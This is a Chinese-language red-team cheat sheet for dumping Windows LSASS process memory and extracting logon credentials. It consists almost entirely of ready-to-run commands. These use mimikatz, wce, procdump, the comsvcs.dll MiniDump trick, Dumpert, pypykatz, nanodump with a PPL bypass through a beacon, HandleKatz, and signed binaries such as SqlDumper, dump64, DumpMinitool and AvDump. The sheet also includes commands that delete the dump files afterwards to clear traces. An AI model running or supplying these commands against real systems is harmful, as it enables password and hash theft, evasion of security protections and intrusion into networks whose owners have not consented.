dump lsa聚合

解密lsass内存

# mimikatz
sekurlsa::Minidump lsassdump.dmp
sekurlsa::logonPasswords full

wce导出hash

# 仅支持Windows XP,2003,Vista,7、2008和Windows 8

wce.exe -o file.txt
wec.exe

Procdump

# 管理员cmd
procdump  -accepteula -ma lsass.exe lsass_dump

procdump -accepteula -ma 720 lsass.dmp

comsvcs.dll

# powershell运行
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass.dmp full

# 清理
Remove-Item $env:TEMP\lsass.dmp -ErrorAction Ignore

dumpert

# exe
Outflank-Dumpert.exe

# dll
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

任务管理器转存

image-20220409122415996

mimikatz

# cmd
mimikatz_exe "sekurlsa::minidump lsass.dump" "sekurlsa::logonpasswords full" exit

pypykatz

# python3
pip install pypykatz

# Parsing minidump file of the LSASS process:
# 从dmp里解密
pypykatz lsa minidump <minidump file>

# Dumping LIVE system LSA secrets:
pypykatz live lsa

volatility3

# 安装
https://github.com/volatilityfoundation/volatility3/releases/download/v2.0.1/volatility3-2.0.1-py3-none-any.whl
python3 -m pip install -U volatility3-2.0.1-py3-none-any.whl

# 使用
vol -f xxx.dmp -o 111.txt

Out-Minidump.ps1

import-module Out-Minidump.ps1
get-process lsass | Out-Minidump

Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore

image-20220409123740776

dump64.exe

一个lolbins:C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\

"C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe" <pid> c:\users\zteam\Desktop\out.dmp

SqlDumper.exe

lolbins:C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe

# Full dump file
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x01100

# Mini-dump file
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x0120

# Mini-dump file that includes indirectly referenced memory.
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x0128

# Filtered dump file
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x8100

nanodump

https://github.com/helpsystems/nanodump

# fork
beacon> nanodump --fork --write C:\lsass.dmp

# MalSecLogon
beacon> nanodump --malseclogon --dup --fork --binary C:\Windows\notepad.exe --valid


# ppl bypass
beacon> nanodump_ppl -v -w C:\Windows\Temp\lsass.dmp

HandleKatz

https://github.com/codewhitesec/HandleKatz

loader.exe --pid:744 --outfile:dump.obfuscated

loader需要自己改改

DumpMinitool

又一个lolbins:C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe

DumpMinitool.exe --file c:\users\public\111.txt --processId 744 --dumpType Full

# 解密
python3 Decoder.py -input dump.obfuscated -output 111.txt

# 可以用pypykatz读取
pypykatz lsa minidump 111.txt

AvDump

AvDump.exe是Avast杀毒软件中自带的一个程序,可用于转储指定进程(lsass.exe)内存数据,它带有Avast杀软数字签名。

AvDump.exe --pid 980 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp

MirrorDump

https://github.com/CCob/MirrorDump

无需本地dll支持